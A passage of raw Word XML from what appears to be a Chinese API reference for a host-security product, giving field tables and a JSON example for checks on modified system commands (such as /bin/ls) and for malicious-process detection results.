          <w:p w14:paraId="3666DD44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04687869" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6705E2E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67DE4661" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="553ED340" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663B1A2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="796316D0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36E006DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B7471BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D3BC8CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099377AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09877890" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="696F2A23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68B0753A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="548E1D38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B03BD71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1FE917C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D28DDFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>package_hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D91D29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B40771A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4325E5AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包hash值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12865EE7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C413542" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA4FF43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E1A8D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C166751" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件hash值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47F37A8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0E9EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cmd": "ls",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "count": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "match_rules": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "7": "uname -a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "local_more": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "local_less": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pkg": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "package_full_name": "coreutils-8.4-46.el6.x86_64",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "package_name": " coreutils ",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "package_version": "8.4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "files": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "file_name": "/bin/ls",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "modify_time": 1394048072,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "permissions": "rwxr-xr-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "package_hash": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "file_hash": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B3B95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="恶意进程"/>
      <w:bookmarkEnd w:id="243"/>
      <w:r>
        <w:t>恶意进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F9A117"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1745"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="58FE526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0A5C0A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71DCA394" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="387C4799" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12D38E14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28DF6BB5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FAC4203" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>virusName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6D4BF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42078178" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34FEAA7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>病毒名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7AC014B6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E33C09E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>virusDescription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42713A46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD57735" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="744AF5AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05BEE657" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35E777BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>libUpdateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE95D9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12B8FC3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DB1B6CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46C25E9C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0797417F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>libName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B846DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48830F5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66F1010E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00533915" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29B46F6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>virusInstruct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A235988" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="092E5AFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5264CE82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13C184AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>静态信息数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2083"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1843"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="76C898F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20B43C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0533FF39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36D2CFC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="507A16C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3700E51C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08A169A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="335E82AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BC83FB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C40A4D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="680DA02C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38623991" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B4733B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6597A442" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05855B56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="137B7309" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DC69F15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77D1E66E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A820944" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79AA408E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DCAC4F6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01F8E608" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="449D7881" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6824BE29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A01ECF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C79C490" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16F30270" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03B139EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41077477" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="560BC462" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72F026BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06767D71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AB70337" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
